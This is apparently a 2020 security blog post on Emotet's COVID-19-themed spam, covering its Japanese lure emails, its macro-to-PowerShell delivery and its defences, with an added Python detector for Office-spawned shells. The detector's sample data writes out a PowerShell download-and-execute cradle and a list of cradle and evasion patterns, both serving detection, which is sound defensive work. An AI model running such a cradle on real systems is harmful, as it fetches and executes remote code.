Emotet: The Trojan is Exploiting “COVID-19” Pandemic as an Opportunity


Since January 2020, the Coronavirus (COVID-19) outbreak has made news all around the world and locked people inside their homes. The virus, believed to have originated in Wuhan, China, is spreading like wildfire around the globe. But with this epidemic ongoing, cybercriminals have also started using this outbreak to their advantage. One of the first pieces of malware to take advantage of it is the well-known Trojan “Emotet” that primarily spreads through spam emails and has used COVID-19 themes to lure people into opening malicious attachments.

The Infection Vector of Emotet Malware Attack Campaign

In January 2020, Emotet was one of the first malware families to leverage the coronavirus scare to spread itself. The infection vector was spam email, in which the email subjects and the attached document file names followed the same pattern but were not identical: they were built from various representations of the current date and the Japanese word for “notification” to add a sense of urgency for users who fell for it. The spam emails looked as if they were sent by a disability welfare service provider in Japan. The body briefly mentioned that there had been reports of coronavirus patients in Gifu (a prefecture in Japan) and asked the reader to view the attached document. Another spam email with an almost identical body warned of infection reports within a different area, Osaka. Looking across all the emails, it was clear that the attackers were cycling through a series of different regions in Japan to scare the residents of those regions into opening the document. By adding a footer with a postal address along with a phone and fax number, the attackers tried to lend the messages more authenticity.

Until a few months ago, Japanese Emotet emails were focused on corporate-style payment notifications and invoices. The coronavirus epidemic, however, turned out to be an opportunity for the Emotet operators: this new approach to delivering Emotet is more successful because the broad impact of the coronavirus and the fear of infection are so real. The attached document displayed a fake Office 365 message telling the viewer to enable the malicious content, and if the file was opened in Protected View, it asked the user to enable editing. If a user fell for it and opened the document with macros enabled, an obfuscated VBA (Visual Basic for Applications) macro script launched PowerShell and delivered the Emotet downloader in the background.

Later in March, the malware adopted a new tactic: its documents were found to include the text of coronavirus news stories from major media companies such as CNN, in an attempt to evade security software that uses artificial intelligence or machine learning. By the end of the month, it was spreading via spam emails carrying either a malicious document or a malicious URL. In this attack campaign, the second stage dropped Emotet, which in turn was found to also drop TrickBot. The crypters for the TrickBot and Emotet Trojans were also observed using text from news stories about President Trump's impeachment to lure their target victims. In early April 2020, an employee of Microsoft opened a phishing email that led to the shutdown of computers and critical systems. Emotet used the victim's compromised computers to launch a distributed denial of service (DDoS) attack. Later, Microsoft revealed that the employee had failed to follow best practice, and that the email filters did not inspect internal emails properly, which allowed Emotet to spread locally without raising any alerts.
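As an added example (not code from the Cyware post or from any vendor), the macro-to-PowerShell chain described above can be surfaced in endpoint telemetry by flagging Office applications that spawn a shell and decoding any -EncodedCommand argument before matching it against download-cradle markers. The event fields follow a Sysmon Event ID 1 layout and the sample events are constructed; both are assumptions for illustration.

```python
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Download-cradle and evasion markers typical of macro-launched PowerShell.
SUSPICIOUS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|iex\b|invoke-expression|"
    r"net\.webclient|-w(indowstyle)?\s+hidden|bypass)", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_ARG = re.compile(r"-e(?:nc(?:odedcommand)?|c)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline: str) -> str:
    """Decode a PowerShell -EncodedCommand value (base64 of UTF-16LE) or return ''."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""

def classify(event: dict) -> str:
    """Severity for one process-creation event: benign, medium or high."""
    if basename(event["ParentImage"]) not in OFFICE_APPS:
        return "benign"            # only Office-spawned processes are in scope here
    if basename(event["Image"]) not in SHELLS:
        return "benign"            # e.g. print helpers legitimately spawned by Word
    # Match on the raw command line plus the decoded payload, so -enc does not hide the cradle.
    text = event["CommandLine"] + " " + decode_encoded_command(event["CommandLine"])
    return "high" if SUSPICIOUS.search(text) else "medium"

def find_alerts(events):
    return [(classify(e), basename(e["ParentImage"]), basename(e["Image"]))
            for e in events if classify(e) != "benign"]

# Constructed sample events; not telemetry from the campaign described in the post.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16le")).decode()
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": OFFICE + r"\WINWORD.EXE", "Image": PS,
     "CommandLine": f"powershell -nop -w hidden -enc {_ENC}"},      # macro -> encoded cradle
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},      # admin script, not from Office
    {"ParentImage": OFFICE + r"\EXCEL.EXE", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c echo hello"},                            # Office child shell, no cradle
    {"ParentImage": OFFICE + r"\WINWORD.EXE", "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 12288"},                           # print helper, benign
]
```

Run `find_alerts(SAMPLE_EVENTS)` to see the two Office-spawned shells ranked, with the encoded cradle scored high and the plain `cmd /c echo` kept at medium for analyst review.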

How to Stay Safe

Because the Emotet malware is spreading via spam emails posing as coronavirus-related messages, carefully examine incoming emails, particularly those that include links or attachments. Always go to genuine news and media websites to read about the coronavirus, instead of clicking on news items received via email. If emails seem to come from a legitimate institution but you don’t remember subscribing to them, verify the sender’s contact information. Deploy the latest updates and vulnerability patches for operating systems and applications, and make sure that anti-spam filters are correctly configured.

Conclusion

As the coronavirus pandemic grows and affects the entire world, attackers are not going to rest, and more malware is likely to come. Emotet is just one of the malware families taking advantage of this unique situation, and more will use the opportunity to their advantage. Users should stay alert and vigilant to such threats. Providing security awareness training to employees, to educate them on how to avoid email-borne threats in this unique situation, can help deal with it.

Indicators of Compromise


 Tags

malspam campaign
covid 19 scams
emotet trojan
coronavirus scams

Posted on: April 15, 2020
